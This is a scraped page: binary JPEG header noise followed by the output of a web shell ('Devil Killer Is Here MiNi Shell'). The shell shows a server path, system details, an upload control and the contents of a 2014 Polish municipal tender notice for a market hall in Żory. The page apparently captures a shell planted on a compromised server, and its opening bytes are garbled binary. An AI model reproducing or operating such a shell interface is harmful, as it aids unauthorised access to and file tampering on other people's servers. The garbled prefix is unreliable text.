JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140829/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140829/185803-N-2014.html

<p class="kh_header"><b>Żory: Budowa hali targowej przy ul. Dąbrowskiego w Żorach wraz z uzyskaniem bezwarunkowej decyzji o dopuszczeniu do użytkowania</b><br>
<b>Numer ogłoszenia: 185803 - 2014; data zamieszczenia: 29.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska  Żory , Al. Wojska Polskiego 25, 44-240 Żory, woj. śląskie, tel. 32 4348245, faks 32 4348248.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zory.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa hali targowej przy ul. Dąbrowskiego w Żorach wraz z uzyskaniem bezwarunkowej decyzji o dopuszczeniu do użytkowania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa hali targowej przy ul. Dąbrowskiego w Żorach wraz z uzyskaniem bezwarunkowej decyzji o dopuszczeniu do użytkowania. Szczegółowy opis przedmiotu zamówienia zawierają: a) dokumentacja projektowa
b) specyfikacje techniczne wykonania i odbioru robót, Dane techniczne obiektu: powierzchnia zabudowy 1 351,66 m2 powierzchnia wiaty 809,10 m2 powierzchnia boksów handlowych 449,10 m2 powierzchnia pom. pozostałych 20,80 m2 zewnętrzne wymiary budynku 36,85 x 36,68 x 9,95 m ETAP I
ZAKRES ROBÓT BUDOWLANYCH: a/hala targowa 1) fundamenty (ławy, stopy i ściany fundamentowe żelbetowe, na podsypce piaskowej i chudym betonie), 2) izolacje poziome i pionowe,(powłokowe bitumiczne, z papy i folii), 3) słupy stalowe pełnościenne ocynkowane i zabezpieczone do klasy odporności ogniowej R30, 4) ściany zewnętrzne  osłonowe do wys.3,36 m,( z pustaków betonowych łupanych gr.19,8 cm), 5) z rdzeniami i wieńcami żelbetowymi. 6) dach-konstrukcja: z dźwigarów z drewna klejonego(dźwigary ramowe o rozstawie 12,00 m i rozpiętości w osiach podpór 36,00 m wewnątrz których zaprojektowano dźwigary drugorzędne w postaci belek o rozstawie 12,00 m i rozpiętości 12,00 m a pomiędzy nimi płatwie. Konstrukcja dachu zostanie usztywniona płytami z drewna klejonego (od dołu) oraz płytą OSB (od góry).Pomiędzy płatwiami przewidziano izolację cieplną wraz z folią paroizolacyjną. 7) pokrycie dachu (membraną dachową PVC-P o gr.1,8 mm ) 8) odwodnienie za pomocą rynien i rur spustowych z blachy tytanowo- cynkowej, 9) posadzka-z kostki  brukowej betonowej.  10) okna z profili aluminiowych w wersji ciepłej, 11) bramy wejściowe (6 szt.) otwierane na zewnątrz z profili stalowych ocynkowanych wyposażonych w zamki i blokady( blokujące skrzydła w chwili otwarcia), 12) boksy sanitariatów wyposażone w urządzenia i instalacje sanitarne wg. Dokumentacji branżowych. b/ boksy (handlowe, sanitariaty, inkasenta, porządkowe) 1) fundamenty ( stopy fundamentowe  żelbetowe, na podsypce piaskowej i chudym betonie), 2) ściany z płyt warstwowych (konstrukcja ścian w postaci ram stalowych z ceowników zimnogiętych, rdzeń z pianki IPN. Ściany boksów przeznaczonych do handlu artykułami spożywczymi pokryte dodatkową warstwą dopuszczoną do kontaktu z żywnością. 3) ścianki działowe w sanitariatach-z płyt kartonowo- gipsowych wodoodpornych, oblicowanych płytkami ceramicznymi, 4) dachy z płyt warstwowych (konstrukcja ścian w postaci ram stalowych z ceowników zimnogiętych, rdzeń z pianki IPN, 5) pokrycie dachów membraną dachową PVC, 6)	odwodnienie za pomocą rynien i rur spustowych z blachy tytanowo- cynkowej, 7) posadzki pod boksami handlowymi - z kostki  brukowej betonowej,  8) posadzki w sanitariatach- betonowe izolowane  i wykończone płytkami ceramicznymi, 9) okna z profili aluminiowych w wersji ciepłej, 10) drzwi: zewnętrzne z profili aluminiowych w wersji ciepłej,  11) drzwi wewnętrzne płycinowe laminowane, 12) rolety (do boksów handlowych) rolowane, ze sterowaniem ręcznym, ZAKRES ROBÓT DROGOWYCH: 1) Organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu. 2) Frezowanie istniejącej nawierzchni bitumicznej gr. 5cm placu pod halę targową. 3) Rozbiórka istniejącej nawierzchni bitumicznej chodnika wzdłuż ul. Dąbrowskiego. 4) Rozbiórka krawężników i obrzeży betonowych na ławie betonowej z oporem. 5) Załadunek i wywóz materiałów z rozbiórki nawierzchni bitumicznej (pozyskany frez)
do ZTK Żory, ul. Okrężna 5 za pokwitowaniem. 6) Załadunek i wywóz materiałów z rozbiórki nawierzchni bitumicznej chodnika oraz rozbiórki obrzeży i krawężników betonowych na wysyp (z potwierdzeniem odbioru  i opłatą za składowanie). 7) Korytowanie oraz wykonanie podbudowy pod zatokę autobusową zlokalizowaną wzdłuż ul. Dąbrowskiego. 8) Załadunek i wywóz materiałów z korytowania na wysyp (z potwierdzeniem odbioru i opłatą za składowanie).
9) Wykonanie niwelacji terenu pod halę targową wraz z tarasami wejściowymi poprzez ukształtowanie nasypów z gruntów niespoistych, niewysadzinowych zagęszczonych 
do odpowiedniego wskaźnika Is (nasypy ukształtowane na odpowiednią szerokość poza obrysem hali targowej wraz z ukształtowaniem skarp umożliwiające bezpieczne użytkowanie obiektu).
10) Ułożenie wokół nawierzchni brukowych hali targowej krawężników betonowych typu ciężkiego wibroprasowanych 20x30x100cm na ławie betonowej z oporem.
11) Ułożenie na połączeniu zatoki autobusowej z istniejącą nawierzchnią ul. Dąbrowskiego krawężników kamiennych granitowych 20x25x100cm typ najazdowy na ławie betonowej z oporem.
12) Wykonanie nawierzchni zatoki autobusowej z kostki granitowej szarej 18/21cm 
na odpowiedniej podbudowie. Spoiny między kostką granitową wypełnione cementową, szybkowiążącą zaprawą do fugowania kostki brukowej (zaprawa zawierająca tras zapobiegający powstawaniu wykwitów wapiennych).
13) Wykonanie nawierzchni hali targowej wraz z dwoma tarasami wejściowymi z kostki brukowej betonowej gr. 8cm na odpowiedniej podbudowie - kostka o wymiarach 37,5x25cm kolor grafitowobiały oraz antracytowografitowy.
14) Wykonanie nawierzchni dojścia do tarasu frontowego hali targowej od strony 
ul. Dąbrowskiego z kostki brukowej betonowej śrutowanej gr. 8cm na odpowiedniej podbudowie - kostka o wymiarach 45x18cm kolor jasno-szary.
15) Wykonanie schodów terenowych oraz murków ozdobnych frontowych (donic) od strony wejścia przy ul. Dąbrowskiego z betonu architektonicznego.
16) Montaż elementów małej architektury przed wejściem od strony ul. Dąbrowskiego - ławki, kosze na śmieci zgodne z opisem w części architektonicznej dokumentacji projektowej.
17) Montaż donic z drzewami (klon kulisty srebrny) na tarasie wejściowym od strony osiedla.
ZAKRES ROBÓT ELEKTRYCZNYCH:
1) Wykonanie i demontaż zasilania elektrycznego placu budowy według potrzeb wykonawcy. Uzyskanie warunków przyłączenia w TAURON i podpisanie umowy na dostawę prądu.
2) Przebudowa oświetlenia przy ul. Dąbrowskiego (kolizja z zaprojektowaną zatoką autobusową) na odcinku wskazanym na rys. A1b zagospodarowanie terenu z Projektu budowlanego wiaty targowej z boksami handlowymi przy u. Dąbrowskiego w Żorach -branża elektryczna projektant mgr inż. Michał Magiera. 
Przebudowa oświetlenia obejmuje ułożenie nowej trasy kablowej i wymianę słupów oraz opraw oświetleniowych - schemat rys. E/17. Rodzaj materiałów wskazano w rozdziale 2.5.3 opisu technicznego. Po robotach kablowych należy doprowadzić tereny zielone oraz nawierzchnię dróg i chodników do stanu pierwotnego lub wykonać roboty technologią bezwykopową. 
3) Likwidacja odcinka 30m sieci kablowej oświetlenia parkingu kolidującej z zaprojektowaną halą targową - demontaż 1 słupa z oprawami ośw., odłączenie likwidowanej linii kablowej oświetlenia parkingu oraz wykonanie mufy kablowej w celu utrzymania ciągłości obwodu (rys. A1b zagospodarowanie terenu). Zdemontowany materiał należy przetransportować do ZTK Żory (1 km). 
4) Demontaż istniejącego oświetlenia parkingu i wykonanie nowego oświetlenia parkingu zgodnie rys. A1b zagospodarowanie terenu i schematem rys. E/17 z Projektu budowlanego wiaty targowej z boksami handlowymi przy u. Dąbrowskiego w Żorach -branża elektryczna projektant mgr inż. Michał Magiera.
5) Wykonanie instalacji elektrycznych hali targowej zgodnie z Projektem budowlanym wiaty targowej z boksami handlowymi przy u. Dąbrowskiego w Żorach -branża elektryczna projektant mgr inż. Michał Magiera (rys. E/1-16): - przeciwpożarowego wyłącznika prądu, - instalacji oświetlenia podstawowego i ewakuacyjnego wiaty targowej, - rozdzielnic elektrycznych boksów handlowych, sanitariatów oraz pomieszczenia inkasenta, - wewnętrznych linii zasilających, - instalacji przeciwporażeniowej, - instalacji gniazd wtyczkowych, - instalacji elektryczna ogrzewania przeciwoblodzeniowego rynien, - instalacji elektryczna ogrzewania przeciwzamrożeniowego hydrantu, - instalacja wentylacji pomieszczeń sanitarnych 1.1, 1.2, 1.4, 1.5 łącznie  z zabudową wentylatorów, - instalacji przeciwprzepięciowej, - instalacji uziemienia i wyrównywania potencjałów, - instalacji odgromowej, - instalacji zasilania urządzeń technologicznych, - instalacji oświetlenia architektonicznego - dekoracyjnego budynku (podświetlenie elewacji, zadaszenia i drzew).
Po robotach kablowych (wlz i oświetlenie dekoracyjne zewnętrzne) należy doprowadzić tereny zielone oraz nawierzchnię dróg i chodników do stanu pierwotnego lub wykonać roboty technologią bezwykopową.
6) Dostawa, montaż i uruchomienie grzejników elektrycznych. Parametry i wyposażenie elektrycznych grzejników konwektorowych:- moc 2500 W , -termostat temperatury, - tryb ANTYZAMARZANIE, - pokrętło z płynną regulacją temperatury, - przycisk włącz/wyłącz urządzenie, - bezpiecznik termiczny załączany automatycznie.
Grzejniki należy zamontować w pomieszczeniach 1.1/2, 1.4/15, 1.56/67. Łącznie należy dostarczyć i zamontować 26 grzejników elektrycznych. 7) Wykonanie przyłącza elektrycznego dla hali targowej na podstawie Projektu budowlanego przyłącza elektrycznego wiaty targowej z boksami handlowymi 
przy ul. Dąbrowskiego w Żorach - branża elektryczna - projektant mgr inż. Michał Magiera.
Zakres prac związany z wykonaniem przyłącza obejmuje budowę linii kablowej niskiego napięcia, YAKXS 4x240 mm2 , ułożonej między stacją transformatorową R1324 ŻORY TS-28/nN (dz. nr  2372/183) a nowo projektowanym złączem kablowym ZK4 w granicy posesji działki nr 2996/183. 
Długość linii kablowej wynosi 115 m. 
Po robotach kablowych należy doprowadzić tereny zielone oraz nawierzchnię dróg 
i chodników do stanu pierwotnego lub wykonać roboty technologią bezwykopową.
W ramach przyłącza projekt przewiduje wymianę istniejącej rozdzielnicy niskiego napięcia stacji transformatorowej, R1324 ŻORY TS-28/nN, na nową rozdzielnicę 10-cio polową wraz z układem pomiarowym - bilansującym.
Ponadto wykonawca jest zobowiązany do przeprowadzenia następujących czynności: - przed wejściem w teren z robotami kablowymi należy uzgodnić warunki prowadzenia prac ziemnych z zarządcom działki nr 2595/183 Spółdzielnią Mieszkaniową Nowa z siedzibą w Jastrzębiu Zdroju, ul. Wielkopolska 5A. Podstawowym warunkiem prowadzenia robót ziemnych na działkach będących 
w zarządzie SM Nowa jest doprowadzenie terenu do stanu pierwotnego. Zabezpieczeniem prawidłowego wykonania prac porządkowych jest kaucja pobierana przez SM Nowa przed rozpoczęciem robót i zwracana po ich pozytywnym odbiorze. - przeprowadzenie i opłacenie w TAURON czynności wyłączenia zasilania 
i dopuszczenia do robót w stacji transformatorowej T-28 - wymiana rozdzielni n.n. 
- przeprowadzenie odbioru przyłącza elektrycznego z udziałem TAURON.
- przygotowanie dokumentacji technicznej, geodezyjnej i przekazanie jej 
dla TAURON (wersja elektroniczna i papierowa).
 - przygotowanie kosztorysu powykonawczego przyłącza elektrycznego w oparciu
 o ceny i narzuty określone przez TAURON w celu określenia ceny wykupu przyłącza - wymagana weryfikacja kosztorysu przez TAURON.
8) Obsługa geodezyjna łącznie z wykonaniem inwentaryzacji powykonawczej robót elektrycznych. 
ZAKRES ROBÓT SIECI I INSTALACJI SANITARNYCH:
1. Budowa kanalizacji sanitarnej i deszczowej.
2. Remont studni kanalizacyjnych.
3. Budowa przyłącza wody wraz z komora wodomierzową i hydrantem zewnętrznym.
4. Budowa instalacji wod. kan. wraz z wyposarzeniem w urządzenia i przybory sanitarne.
5. Budowa instalacji p.poż.
6. Wentylacja sanitariatów - opis w dokumentacji elektrycznej.
7. Odtworzenie nawierzchni asfaltowej po wykonaniu robót kanalizacyjnych i przyłącza wody - jeżeli będzie taka konieczność.
8. Wykonanie kamerowania kanalizacji sanitarnej i deszczowej wraz z pomiarem spadków.
ETAP II
ZAKRES ROBÓT DROGOWYCH:
1)  Organizacja placu budowy wraz z wprowadzeniem tymczasowej organizacji ruchu.
2) Zdemontowanie tymczasowego miejsca handlu z wywozem materiałów z rozbiórki blaszanych kontenerów handlowych do ZTK Żory, ul. Okrężna 5 za pokwitowaniem
(w ofercie uwzględnić koszty rozbiórki, transportu i rozładunku z ułożeniem w stosy materiału pozyskanego z rozbiórki kontenerów handlowych) - lokalizacja tymczasowego miejsca handlu w terenie zgodnie z rysunkiem Plan targowiska.
3) Frezowanie istniejącej nawierzchni bitumicznej gr. 5cm placu pod parking i drogę manewrową.
4) Rozbiórka krawężników i obrzeży betonowych na ławie betonowej z oporem.
5) Załadunek i wywóz materiałów z rozbiórki nawierzchni bitumicznej (pozyskany frez) do ZTK Żory, ul. Okrężna 5 za pokwitowaniem.
6) Załadunek i wywóz materiałów z rozbiórki obrzeży i krawężników betonowych na wysyp (z potwierdzeniem odbioru i opłatą za składowanie).  
7) Wykonanie niwelacji terenu pod parking wraz z drogą manewrową poprzez korytowanie i ukształtowanie nasypów z gruntów niespoistych, niewysadzinowych zagęszczonych 
do odpowiedniego wskaźnika Is (nasypy ukształtowane na odpowiednią szerokość poza obrysem parkingów wraz z ukształtowaniem skarp umożliwiające bezpieczne użytkowanie obiektu).
8) Ułożenie wokół nawierzchni brukowych parkingów krawężników betonowych typu ciężkiego wibroprasowanych 20x30x100cm na ławie betonowej z oporem.
9) Wykonanie nawierzchni parkingów oraz drogi manewrowej z kostki brukowej betonowej śrutowanej gr. 8cm na odpowiedniej podbudowie - kostka o wymiarach 45x18cm kolor jasno-szary (miejsca parkingowe wydzielone kostką tego samego rodzaju ale w kolorze ciemnoszarym).
10) Wykonanie odwodnienia parkingów wraz z drogą manewrową oraz zadaszenia hali targowej: montaż kompletnych wpustu ściekowych ulicznych z osadnikiem, wykonanie sieci kanalizacji deszczowej wraz z montażem studni, wpięcie nowej sieci kanalizacji deszczowej do istniejących studni wzdłuż ul. Dąbrowskiego oraz wzdłuż Traktu Piastowskiego.
11) Wykonanie niwelacji nawierzchni istniejących chodników wzdłuż ul. Dąbrowskiego
w miejscach kolizji z nowymi nawierzchniami brukowymi.
12) Montaż elementów małej architektury - stojaki na rowery.
13) Wykonanie terenów zielonych wokół placu targowego wraz z nasadzeniami (klon kulisty srebrny i bordowy).
14) Wykonanie docelowej organizacji ruchu.
15) Porządkowanie terenu po robotach budowlanych. 
Wymagania ogólne dotyczące robót drogowych dla etapu I i II:		
- Wykonawca w ramach zadania wykona i przekaże Zamawiającemu inwentaryzację geodezyjną powykonawczą z naniesieniem na zasoby geodezyjne przez uprawnionego geodetę w 3 egz. - przedłożyć na dzień odbioru (dotyczy całego zakresu robót wraz z przyłączami i sieciami).  - Wykonawca we wskazanych miejscach przez Zamawiającego wykona badania nośności podłoża gruntowego sondą dynamiczną lub płytą VSS, wyniki badań zostaną dostarczone Zamawiającemu najpóźniej w dniu odbioru robót. - W czasie wykonywania robót zapewnić dojście i dojazd do posesji (dotyczy obiektów usługowych od strony osiedla). Wykonać organizację ruchu na czas robót budowlanych. - W czasie wykonywania robót zapewnić możliwość użytkowania części terenu targowiska miejskiego zgodnie z dołączonym rysunkiem plan targowiska. - Wykonawca odpowiada za ochronę środowiska na placu budowy i w jego otoczeniu, podejmuje odpowiednie środki w celu zabezpieczenia dróg prowadzących do placu budowy przed zniszczeniem i zanieczyszczeniem spowodowanym jego środkami transportowymi. Po zakończeniu robót przywraca je do stanu pierwotnego.
 - Stosowane materiały powinny posiadać atesty oraz deklaracje zgodności - materiały potrzebne dla celów  realizacji przedmiotowego zamówienia są w gestii Wykonawcy. - Masy ziemne, gruz i odpady powstałe w trakcie robót przekazać odbiorcy odpadu posiadającemu zezwolenie na prowadzenie działalności w zakresie odzysku odpadów zgodnie z ustawą o odpadach z dnia 14 grudnia 2012 roku (Dz. U. z 2013r. poz. 21) lub wykorzystać we własnym zakresie zgodnie z posiadanym zezwoleniem na prowadzenie przetwarzania odpadów. Przekazanie odpadów należy udokumentować pisemnie.

Uwagi dodatkowe
Uzyskać decyzję o bezwarunkowym dopuszczeniu do użytkowania hali targowej w tym przeprowadzić odbiory z udziałem Państwowej Straży Pożarnej w Żorach, Sanepidu, PINB- wniosek o wydanie decyzji o pozwoleniu na użytkowanie i odbiór.

2) Przedstawione w dokumentacji przetargowej wskazania na urządzenia techniczne
/materiały/znak towarowy z podaniem producenta oraz wskazania na normy o których mowa w art. 30 ust. 1-3 ustawy pzp, należy traktować jako przykładowe, ze względu na zasady ustawy pzp, a zwłaszcza art. 29 i 30. Oznacza to, że Wykonawcy mogą zaproponować inne niż wyszczególnione w dokumentacji rozwiązania z zachowaniem odpowiednich, równoważnych parametrów technicznych dla osiągnięcia oczekiwanej funkcjonalności całego układu, będącego przedmiotem zamówienia.
Wykonawca jest zobowiązany wykazać jakie materiały i urządzenia zostały zmienione i określić jakie materiały i urządzenia w ich miejsce proponuje. 
Ponadto winien wykazać w sposób nie budzący wątpliwości, że wskazane rozwiązania 
są równoważne..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.21.30.00-3, 45.40.00.00-1, 45.11.27.00-2, 45.23.31.42-6, 45.31.00.00-3, 45.31.51.00-9, 45.31.12.00-2, 45.31.11.00-1, 45.23.14.00-9, 45.31.43.00-4, 45.31.53.00-1, 45.31.61.00-6, 45.23.13.00-8, 45.11.21.00-6, 45.33.20.00-3, 45.33.22.00-5, 45.33.24.00-7, 45.33.23.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 100.000  (słownie: sto tysięcy złotych 0/00)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli Wykonawca wykonał roboty budowlane w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, tj. co najmniej:
a)	dwa obiekty kubaturowe wykonane z konstrukcji stalowej o powierzchni zabudowy każdego z nich nie mniejszej niż 500 m2 każdy,
b)	jedną konstrukcję dachu z drewna klejonego o powierzchni dachu nie mniejszej niż 800 m2. Dopuszcza się aby konstrukcja ta była wykonana w ramach jednego z obiektów kubaturowych opisanych w punkcie a.
oraz załączy dowody dotyczące najważniejszych robót, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli Wykonawca wskaże osoby, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialne za: 
a)	kierowanie robotami budowlanymi w specjalności obejmującej uprawnienia do wykonywania dróg (uprawnienia w zakresie kierowania, nadzorowania i kontrolowania budowy), 
b)	kierowanie robotami budowlanymi w specjalności sieci i instalacji elektrycznych (uprawnienia w zakresie kierowania, nadzorowania i kontrolowania budowy),
c)	kierowanie robotami budowlanymi w specjalności sieci i instalacji sanitarnych (uprawnienia w zakresie kierowania, nadzorowania i kontrolowania budowy),
d)	kierowanie robotami budowlanymi w specjalności konstrukcyjno-budowlanej (uprawnienia 
w zakresie kierowania, nadzorowania i kontrolowania budowy),
wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
Wykonawca oświadczy, że osoby(a), które będą uczestniczyć w wykonywaniu zamówienia posiadają(a) wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

Zamawiający dopuszcza łączenie funkcji kierowników robót pod warunkiem posiadania wymaganych uprawnień.

W przypadku osób posiadających uprawnienia wydane poza terytorium Rzeczpospolitej Polskiej wymaga się aby osoby te spełniały odpowiednie warunki opisane w art. 12a ustawy Prawo budowlane. Zamawiający uzna uprawnienia zdobyte na podstawie przepisów obowiązujących przed dniem wejścia w życie ustawy Prawo budowlane oraz właściwych aktów wykonawczych do niniejszej ustawy - w oparciu o art. 104 ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2003 r. Nr 207, poz. 2016 ze zmianami).
Wykonawca oświadczy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
